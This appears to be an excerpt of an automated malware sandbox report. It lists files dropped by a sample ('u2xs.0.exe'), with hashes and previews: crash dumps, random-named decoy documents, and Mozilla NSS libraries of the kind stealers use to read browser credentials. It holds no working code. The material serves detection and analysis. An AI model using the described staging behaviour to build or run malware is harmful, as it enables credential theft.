Size (bytes):	65536
Entropy (8bit):	1.0755266572551072
Encrypted:	false
SSDEEP:	192:oNRuMbxe0AZ/3sFjsq5eugCzuiFPZ24IO8h:+uMbxFAZfsFjgCzuiFPY4IO8h
MD5:	F2C822B1746B9E6EB6F471B22A4F6E8F
SHA1:	8EDC554CCF758ABC193493EE6C11728D9C0E963D
SHA-256:	621677EE76A25ABB7FCD59F2A4D81C19917229B07785BB69AA490A146BFFDD76
SHA-512:	FA1CD02C8DDDCAFB7FBFE0E9374E7E7FAD7EA176E2C98B357D08224A3D1FBD1936E7CBB42B908D3943A719D9BAEB19AB547587F66E194E832D366F917877F43A
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.1.7.8.9.0.5.5.1.0.3.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.1.7.8.9.1.6.4.3.6.5.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.1.3.0.6.b.b.-.3.0.4.9.-.4.b.7.8.-.8.7.a.4.-.d.0.d.3.d.9.f.5.9.7.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.2.d.6.2.d.3.-.5.8.f.5.-.4.b.3.4.-.9.c.0.c.-.c.c.e.b.5.d.e.2.1.7.4.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.e.0.-.0.0.0.1.-.0.0.1.4.-.1.2.0.6.-.5.7.f.2.e.b.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.6.b.f.a.1.7.8.b.6.4.c.8.e.4.f.b.0.3.4.4.0.c.7.1.e.7.0.b.e.0.0.0.0.0.f.f.f.f.!.0.0.0.0.c.2.c.4.d.4.e.5.0.9.6.9.2.7.c.3.5.6.6.f.1.6.8.b.c.f.2.4.5.b.4.a.9.3.6.8.d.b.b.9.!.i.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4././.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E9B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 26 15:11:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51302
Entropy (8bit):	2.838599567147297
Encrypted:	false
SSDEEP:	384:T8CIzoX8w0/JbO8FD6E1jyt9AyDtWJjiSVUyJm:BIoNi5O8FD6E1GoaWJLVU3
MD5:	C7DBB44248C716C6836A40E01F2549F2
SHA1:	CFAF2B7E2BD1A88173E7DDA1C2346B033A914191
SHA-256:	79F113F04E3D57E16D0DAF43E44099312B2984415D3201D6C1D2C18BDE629274
SHA-512:	36C19A6C0C966F11B8200397A7934581390A6E94A141E5751E3E707C63078BEEE2B5BB6E855CBE01D5CC142ECFE12BB83DA5BD647677C6537CDE4BC10A65CF26
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .......#.+f............4...........H...H.......d....#......t...4?..........`.......8...........T............:..............(...........*..............................................................................eJ......x+......GenuineIntel............T.............+f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER80FD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8234
Entropy (8bit):	3.688556728776506
Encrypted:	false
SSDEEP:	192:R6l7wVeJaN6Z6YEOm6RYgmfsS/EpD+89bY+sfJuIm:R6lXJo6Z6YEX6OgmfsSOY9fy
MD5:	51DA137DB04BC830591AAB1DA73E7A53
SHA1:	D5EBF9D05B700E291056BC0E4CC8422B552E7650
SHA-256:	256CB45C6E596BDDF07EBF54C30B1AD9E870280AB8C5299EAD8E567FD30D7210
SHA-512:	B45711C689EB21308EDCB6732BD91C82C1F749DE785FE0C75F887C216A857D6BEEB027684935886420BFE0BE10BB63FA3909D00D0138C1B5C445A5AD6B37DF4E
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER816C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4523
Entropy (8bit):	4.416352548740883
Encrypted:	false
SSDEEP:	48:cvIwWl8zsNJg77aI9pWWpW8VYdYm8M4JWVFgj+q8gsPDC9d:uIjfnI7f37V5JfjO7C9d
MD5:	B4B06270B13C62F686766AC1E6EADE11
SHA1:	C3E0A389D0F16E2FFA8631CB0A28736BB1CB221E
SHA-256:	597729605A1B9A0AF6F8B2C59B2F7DEAC19008A13E065E5B6BC346B0D88740A8
SHA-512:	094CDEB1C5C6F21955B18A1B9652C8FFA2D0E4BFF0D92776D7CCEABA29624610711078EA18FED558548E59571BCADB01602864CFBFF22C5DB632A131471FA621
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297014" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\NIRMEKAMZH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Reputation:	unknown
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\ProgramData\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6998645060098685
Encrypted:	false
SSDEEP:	24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
MD5:	1676F91570425F6566A5746BC8E8427E
SHA1:	0F922133E2BEF0B48C623BEFA0C77361F6FA3900
SHA-256:	534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
SHA-512:	07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
Malicious:	false
Reputation:	unknown
Preview:	NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

C:\ProgramData\NYMMPCEIMA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Reputation:	unknown
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\ProgramData\NYMMPCEIMA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Reputation:	unknown
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\ProgramData\SQSJKEBWDT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Reputation:	unknown
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.234823197941235
Encrypted:	false
SSDEEP:	6:q0MoSf9S0TCfk3VotGjZb34L0MoSf21Qilo4MoSfVJs0TCfk3VotGjZb34L0MoS0:1kV9TXVotgOL0khiTkNJHTXVotgOL0k0
MD5:	8C7B7D95F2F570949DEAD6DB0694EB5B
SHA1:	A4FDC2A9003645DCC47D46A28557A637AB74119C
SHA-256:	76E8CE75B9AF7489359DFF8145993BAF0BC570E893FC267B2FB358FDF7459A80
SHA-512:	C3E612692506174C2C0615B16C5FF2D29D116BFBF9046795D8CB6FF55E18DD092FD35217892ED71A09FB1EA17A2758C69988E543B8E3A782B0A37D6615224CF9
Malicious:	false
Reputation:	unknown
Preview:	[04/26/24 17:11:31] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 17:11:32] IsValidCommunication : Result := True...[04/26/24 17:11:53] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 17:11:54] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
